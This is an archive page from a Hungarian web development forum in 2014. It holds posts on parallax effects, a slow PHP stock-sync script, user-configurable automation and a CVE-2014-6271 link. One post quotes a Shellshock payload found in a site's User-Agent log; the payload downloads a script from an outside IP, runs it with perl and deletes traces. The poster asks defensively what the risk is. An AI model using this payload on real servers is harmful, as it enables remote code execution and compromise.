Archívum
október 3, 2014
Why GitHub is not your CV
Kevés és nem strukturált információt szolgáltat a GitHub a munka szempontjából
■ Creating Scrolling Parallax Effects with CSS
A népszerű effektus megvalósítása szkript nélkül
■ USER_AGENT exploit?
A weboldalamon a látogatói statisztikákat egy adatbázisban tárolom, ahol puszta kíváncsiságból bedobtam egy useragent oszlopot is, ami értelemszerűen a $_SERVER['USER_AGENT'] változó értékét kapja meg (szerencsére az admin panel sehol nem iratja ki ezt). Ahogy nézegettem az adatokat, ezt találtam köztük:Annyira rájöttem, hogy a kis hamis letöltene valami fájlt az adott IP-ről, aztán azt lefuttatná perl-el és eltakarítaná a nyomait.
Az egyértelmű, hogy nem jó szándékkal tenné, viszont az érdekelne, hogy mely esetekben fordulhat elő, hogy shell scriptben futtassak le USER_AGENT-et? Mikor jelent ez veszélyt?
■ () { :;}; /bin/bash -c "wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/Az egyértelmű, hogy nem jó szándékkal tenné, viszont az érdekelne, hogy mely esetekben fordulhat elő, hogy shell scriptben futtassak le USER_AGENT-et? Mikor jelent ez veszélyt?
október 2
Parallax design
Sziasztok!
Épp egy parallax-os oldalon dolgozok, kérdésem az lenne milyen JS plugin-t ajánlotok parallax működéshez, aki csinált már ilyet tud-e valami használhatót?
Előre is köszönöm!
■ Épp egy parallax-os oldalon dolgozok, kérdésem az lenne milyen JS plugin-t ajánlotok parallax működéshez, aki csinált már ilyet tud-e valami használhatót?
Előre is köszönöm!
október 1
Egyik adatbázisból a másikba másolás bizonyos feltételek teljesülése esetén
Sziasztok!
Egy webáruházat fejlesztek és azt szeretném megoldani, hogy az offline bolt raktárkészletét folyamatosan kövesse a webáruház raktárkészlete. Kb. 3000 termékről van szó.
Tehát ha eladnak valamit az offline boltban, akkor a webáruházban is csökkenjen annak a terméknek a darabszáma.
Ezt egyelőre egy cron-al oldottam meg. Linkelem a PHP kódot, ami minden egyes percben lefutott.Nos, ezzel az egyszerű kóddal az a legnagyobb gond, hogy 3000 termék esetén csekély 4 óra alatt fut le.
Biztos vagyok benne, hogy van ennél sokkal jobb és elegánsabb megoldás.
Ha van ötletetek kérlek osszátok meg velem!
Köszönöm!
Peti
■ Egy webáruházat fejlesztek és azt szeretném megoldani, hogy az offline bolt raktárkészletét folyamatosan kövesse a webáruház raktárkészlete. Kb. 3000 termékről van szó.
Tehát ha eladnak valamit az offline boltban, akkor a webáruházban is csökkenjen annak a terméknek a darabszáma.
Ezt egyelőre egy cron-al oldottam meg. Linkelem a PHP kódot, ami minden egyes percben lefutott.
<?php
$db = new MySQLi(offline üzlet adatbázisa);
$db2 = new MySQLi(online üzlet adatbázisa);
if ($db->connect_errno) {
exit();
}
$lekerdez = "select cikkszam,cikkszam_nev,db,kisker_ar,nyilv_ar,kategoria,db from cikkszam order by 1";
$lekerdez2 = "select model,quantity from bio_product";
$talalat = $db->query($lekerdez);
$talalat2 = $db2->query($lekerdez2);
$n = $talalat->num_rows;
$s = $talalat2->num_rows;
for ($i=0; $i<$s; $i++) {
$sor2 = $talalat2->fetch_assoc();
$aktdb=0;
for ($j=0; $j<$n; $j++) {
$sor = $talalat->fetch_assoc();
if (stripslashes($sor['cikkszam']) == stripslashes($sor2['model']) && stripslashes($sor['db']) != stripslashes($sor2['quantity'])) {
$aktdb = $sor['db'];
mysqli_query($db2,"UPDATE bio_product SET quantity=".$aktdb." WHERE model='".stripslashes($sor2['model'])."'");
break;
}
}
$talalat = $db->query($lekerdez);
}
$db->close();
?>
Biztos vagyok benne, hogy van ennél sokkal jobb és elegánsabb megoldás.
Ha van ötletetek kérlek osszátok meg velem!
Köszönöm!
Peti
Felhasználó által beállítható automatizmusok
Sziasztok,
a következő problémába futottam bele:
adott egy adminisztrációs felület, ahol rendeléseket és termékeket lehet kezelni.
Jelenleg egy olyan funkció implementálásán dolgozom, amivel a rendszert használó felhasználó
egyedi automatizmusokat tud létrehozni, például ha egy termék státusza "készleten" helyett "nincs készleten"
lett, akkor a rendszer (azonnal, vagy pl. az esemény bekövetkezte után 3 nappal, tehát lehet késleltetni is) küldjön egy emailt az illetékes személynek,
vagy minden hétfőn reggel küldje ki a rendszer egy email címre a termékek listáját.
Az eseményhez/feltételhez kötődő műveletek elvégzése nem jelent gondot, viszont még nem találtam meg a megfelelő
módot, hogy hogyan vizsgáljam egy esemény (vagy időpont) bekövetkeztét, illetve hogyan kezeljem a késleltetéseket.
Van valakinek ötlete, hogy milyen formában lehetne tárolni a felhasználó által megadott feltételrendszert,
illetve hogyan lehetne azok bekövetkezését vizsgálni?
Előre is köszönök minden segítséget!
■ a következő problémába futottam bele:
adott egy adminisztrációs felület, ahol rendeléseket és termékeket lehet kezelni.
Jelenleg egy olyan funkció implementálásán dolgozom, amivel a rendszert használó felhasználó
egyedi automatizmusokat tud létrehozni, például ha egy termék státusza "készleten" helyett "nincs készleten"
lett, akkor a rendszer (azonnal, vagy pl. az esemény bekövetkezte után 3 nappal, tehát lehet késleltetni is) küldjön egy emailt az illetékes személynek,
vagy minden hétfőn reggel küldje ki a rendszer egy email címre a termékek listáját.
Az eseményhez/feltételhez kötődő műveletek elvégzése nem jelent gondot, viszont még nem találtam meg a megfelelő
módot, hogy hogyan vizsgáljam egy esemény (vagy időpont) bekövetkeztét, illetve hogyan kezeljem a késleltetéseket.
Van valakinek ötlete, hogy milyen formában lehetne tárolni a felhasználó által megadott feltételrendszert,
illetve hogyan lehetne azok bekövetkezését vizsgálni?
Előre is köszönök minden segítséget!
szeptember 27
JSFIDDLE - segítség
Üdv,
Adott egy számomra tetszetős naptár script!
De nem tudom lementeni, mert nem ismerem a jquery-t!
Ha esetleg valaki tudna segíteni abban, hogy milyen js/css fájlokat kell beilleszteni, hogy működjön, akkor nagyon örülnék!
Köszöszönet mindenkinek!
■ Adott egy számomra tetszetős naptár script!
De nem tudom lementeni, mert nem ismerem a jquery-t!
Ha esetleg valaki tudna segíteni abban, hogy milyen js/css fájlokat kell beilleszteni, hogy működjön, akkor nagyon örülnék!
Köszöszönet mindenkinek!
szeptember 26
Messing around with <a download>
Veszélyt jelenthetnek a letöltő hivatkozások az óvatlan felhasználókra
■ CVE-2014-6271: remote code execution through bash
Régen létező hiba a Bash shellben, ami akár távolról kezdeményezett kódfuttatást is lehetővé tehet
■ szeptember 26
Micsoda? Magyar és érdekes?
Magyarországi befektetésre ösztönöz az Egyesült Államokban a Prezi
■ 
